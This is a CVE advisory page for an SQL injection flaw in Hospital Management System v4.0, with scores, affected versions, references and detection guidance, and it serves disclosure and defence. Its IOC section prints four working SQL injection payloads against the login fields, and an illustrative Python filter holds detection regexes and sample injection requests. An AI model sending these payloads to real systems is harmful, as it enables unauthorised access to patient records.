CVE-2022-24263
Published 2022-01-31
CVE-2022-24263: Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.
Priority P2 · 61 · critical · 9.8 CVSS 3.1
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 8.24% (94.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgurukul | hospital_management_system | — | — |
Detection & IOCs (extracted from sources)
- command: `email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login`
- command: `email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login`
- command: `username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login`
- command: `username3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login`
- Monitor POST requests to func.php, function.php, contact.php, and func3.php for SQL injection patterns including SLEEP(), UNION ALL SELECT, and FLOOR(RAND()) error-based payloads in the email, txtName, txtPhone, and username3 parameters.
- Detect time-based blind SQLi via SLEEP() calls in POST body parameters (e.g., txtName, email); alert on SLEEP values >= 3 seconds originating from these endpoints.
- Detect error-based SQLi using FLOOR(RAND()*2) GROUP BY CONCAT pattern in POST parameters targeting the email and username3 fields on login endpoints (patsub=Login, docsub1=Login).
- Look for the hex-encoded canary strings 0x7162706271 and 0x716b767a71 (decoding to 'qbpbq' and 'qkvzq') in HTTP responses, which are SQLi UNION/error-based confirmation markers used by the attacker.
- The vulnerable application is Hospital Management System v4.0 only; the affected files are func.php, function.php, contact.php, and func3.php. Detection rules should be scoped to these specific paths to avoid false positives on other PHP applications.
- The exploit targets POST parameters (email, txtName, txtPhone, username3); WAF or IDS rules should inspect POST body content, not just URL query strings, for these endpoints.
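The guidance above as a small POST-body filter, an added example that is not from the advisory or any of its sources. The function names, rule labels and sample requests are constructed for illustration; the paths, parameters, threshold and markers are the ones listed above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scope taken from the guidance above: affected files and targeted POST parameters.
SCOPED_FILES = {"func.php", "function.php", "contact.php", "func3.php"}
WATCHED_PARAMS = {"email", "txtName", "txtPhone", "username3"}
SLEEP_MIN_SECONDS = 3  # alert threshold for time-based probes

RULES = {  # rule labels are hypothetical names for this example
    "union_select": re.compile(r"union\s+all\s+select", re.I),
    "error_based_floor_rand": re.compile(
        r"group\s+by\s+concat\(.*floor\(\s*rand\(\d*\)\s*\*\s*2\s*\)", re.I | re.S),
}
SLEEP_RE = re.compile(r"sleep\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
# Decoded forms of the hex canaries 0x7162706271 and 0x716b767a71.
RESPONSE_MARKERS = [bytes.fromhex(h).decode() for h in ("7162706271", "716b767a71")]

def inspect_post(path, body):
    """Return sorted (parameter, rule) hits for one urlencoded POST body."""
    if urlsplit(path).path.rsplit("/", 1)[-1] not in SCOPED_FILES:
        return []  # out of scope: avoid false positives on other PHP apps
    hits = set()
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        for rule, rx in RULES.items():
            if rx.search(value):
                hits.add((name, rule))
        if any(float(s) >= SLEEP_MIN_SECONDS for s in SLEEP_RE.findall(value)):
            hits.add((name, "time_based_sleep"))
    return sorted(hits)

def response_markers(text):
    """Return the confirmation markers present in an HTTP response body."""
    return [m for m in RESPONSE_MARKERS if m in text]

# Constructed sample requests (not captured traffic).
BASE = "/Hospital-Management-System-master/"
SAMPLES = [
    (BASE + "func.php", "email=alice%40example.test&password2=x&patsub=Login"),
    (BASE + "func.php", "email=a%27%2B(select(sleep(20)))%2B%27&password2=x&patsub=Login"),
    (BASE + "func3.php", "username3=a%27+OR+1+GROUP+BY+CONCAT(0x71,FLOOR(RAND(0)*2))"
                         "+HAVING+MIN(0)%23&password3=x&docsub1=Login"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, inspect_post(path, body))
```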
CVSS provenance
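| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |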
- http://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.html
- https://github.com/kishan0725/Hospital-Management-System/issues/17
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263
- https://github.com/truonghuuphuc/CVE
- https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html